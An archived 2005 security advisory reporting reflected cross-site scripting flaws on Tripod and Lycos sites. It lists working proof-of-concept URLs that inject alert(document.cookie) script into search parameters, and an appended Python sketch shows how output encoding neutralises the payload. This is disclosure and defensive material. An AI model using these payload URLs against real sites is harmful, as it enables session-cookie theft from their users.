
tripodXSS.txt

Posted Mar 30, 2005
Authored by Diabolic Crab | Site hackerscenter.com

Tripod.com suffers from multiple cross site scripting flaws.

tags | exploit, xss
SHA-256 | 5e26ffe5df8029d71eaf9663f809a5b324b485a87e40fab11d05f233ebdef46e

Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity: Medium
Title: Multiple xss vulnerabilities in Tripod.com
Date: March 30, 2005
Site: http://www.tripod.com

Summary:
There are multiple XSS vulnerabilities in Tripod.com.

Proof of Concept Exploit:

http://shopping.lycos.co.uk/query.html?cat=0&brd=&mrc=&qu=&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://shopping.lycos.co.uk/query.html?cat=0&brd=&mrc=&qu=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&query=1
Pops cookie

http://shopping.lycos.co.uk/query.html?cat=0&brd=&mrc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=&query=1
Pops cookie

http://shopping.lycos.co.uk/query.html?cat=0&brd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&mrc=&qu=&query=1
Pops cookie

http://shopping.lycos.co.uk/query.html?cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&brd=&mrc=&qu=&query=1
Pops cookie

http://webhosting.lycos.co.uk/business/compare/?compareId=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://webhosting.lycos.co.uk/consumer/compare/?compareId="><script>alert(document.cookie)</script>
Pops cookie

http://www.multimania.lycos.fr/search/?query=php&collection="><script>alert(document.cookie)</script>&action=1
Pops cookie

http://www.tripod.jubii.dk/search/?query=php&collection=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=1
Pops cookie

http://www.tripod.lycos.co.uk/search/?query=php&collection=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=1
Pops cookie

http://www.tripod.lycos.de/search/?query=php&collection=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=1
Pops cookie

http://www.tripod.lycos.es/search/?query=php&collection=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=1
Pops cookie

http://www.tripod.lycos.it/search/?query=php&collection=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=1
Pops cookie

http://www.tripod.lycos.nl/search/?query=php&collection=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=1
Pops cookie

http://www.tripod.spray.se/search/?query=php&collection=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=1
Pops cookie


Author:
These vulnerabilities have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to
contact me regarding these vulnerabilities. You can find me at
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab.
Look out for my soon to come out book on Secure coding with php.
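
Added example, not part of the advisory: every proof-of-concept value above begins with `">`, which suggests the parameter is reflected inside a double-quoted HTML attribute. The Python sketch below assumes such a template (hypothetical; the advisory does not show the real page markup) and compares verbatim reflection with `html.escape` output encoding, using the standard-library HTML parser to show which elements each response contains.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# One of the advisory's proof-of-concept URLs, decoded from quoted-printable.
POC_URL = ("http://www.tripod.lycos.co.uk/search/?query=php&collection="
           "%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=1")

# Hypothetical template (assumption): the real Tripod/Lycos markup is not on the page.
TEMPLATE = '<form><input type="hidden" name="collection" value="{value}"></form>'


def render_vulnerable(value: str) -> str:
    """Reflects the parameter verbatim, so a '"' ends the attribute early."""
    return TEMPLATE.format(value=value)


def render_hardened(value: str) -> str:
    """Encodes &, <, > and both quote characters before reflecting."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


class TagCollector(HTMLParser):
    """Records the start tags and the input field value that a parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.field_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.field_value = dict(attrs).get("value")


def parse_markup(markup: str) -> TagCollector:
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


def collection_param(url: str) -> str:
    """Returns the URL-decoded 'collection' parameter, as the server receives it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["collection"][0]
```

With verbatim reflection the parser reports a `script` element and an empty field value; with encoding it reports only `form` and `input`, and the field value round-trips to the original string as inert data.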
